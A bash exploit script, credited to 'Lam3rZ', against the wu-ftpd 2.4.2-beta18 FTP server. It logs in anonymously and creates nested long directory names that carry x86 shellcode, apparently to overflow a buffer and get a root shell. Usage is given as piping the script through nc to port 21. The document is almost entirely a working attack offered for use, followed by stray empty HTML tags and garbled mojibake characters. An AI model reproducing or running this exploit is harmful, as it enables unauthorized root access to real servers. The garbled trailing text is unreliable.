#!/bin/bash # # (c) Lam3rZ # !!!!!!!!!!!!!!!!!!!!!!!! # (./skrypt.sh ; cat) | nc host 21 # !!!!!!!!!!!!!!!!!!!!!!!! # # # tested on suse 6.0, wu-ftpd 2.4.2-beta18 # real-path: /export/ftp/incoming # fix offset by editing print "A" after shellcode, 97 was good for me... # it depends on real-path length 'fcoz # DDD=`perl -e 'print "A" x 250'` EEE=`perl -e 'print "A" x 20'` FFF=`perl -e 'print "\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc0\x31\xdb\x43\x89\xd9\x41\xb0\x3f\xcd\x80\xbe\xab\x15\x0b\x08\x31\xc0\x31\xc9\x8d\x5e\x01\x88\x46\x04\x31\xc9\xb5\x02\x66\x49\xb0\x27\xcd\x80\x31\xc0\x8d\x5e\x01\xb0\x3d\xcd\x80\x31\xc0\x31\xdb\x8d\x5e\x08\x89\x43\x02\x31\xc9\xfe\xc9\x31\xc0\x8d\x5e\x08\xb0\x0c\xcd\x80\xfe\xc9\x75\xf3\x31\xc0\x88\x46\x09\x8d\x5e\x08\xb0\x3d\xcd\x80\xfe\x0e\xb0\x30\xfe\xc8\x88\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xc0\x31\xdb\xb0\x01\xcc\x80\x30\x62\x69\x6e\x30\x73\x68\x31\x2e\x2e\x31\x31\x42\x69\x42\x69";print "A" x 97; print "\x24\x15\x0b\x08"'` # nice shellcode, isn't it? :) # by bulba 'fcoz... there is no \xff 'coz that fuqn wu will kick off that char echo user ftp echo pass ftp@ftp.pl echo cwd /incoming echo mkd $DDD echo cwd $DDD echo mkd $DDD echo cwd $DDD echo mkd $DDD echo cwd $DDD read echo mkd $EEE echo cwd $EEE echo mkd $FFF echo cwd $FFF echo id
<span id="7ztzv"></span>
<sub id="7ztzv"></sub>


<span id="7ztzv"></span><form id="7ztzv"></form>


<span id="7ztzv"></span>
    

      

        <address id="7ztzv"></address>
            

ÑÇÖÞÅ·ÃÀÔÚÏß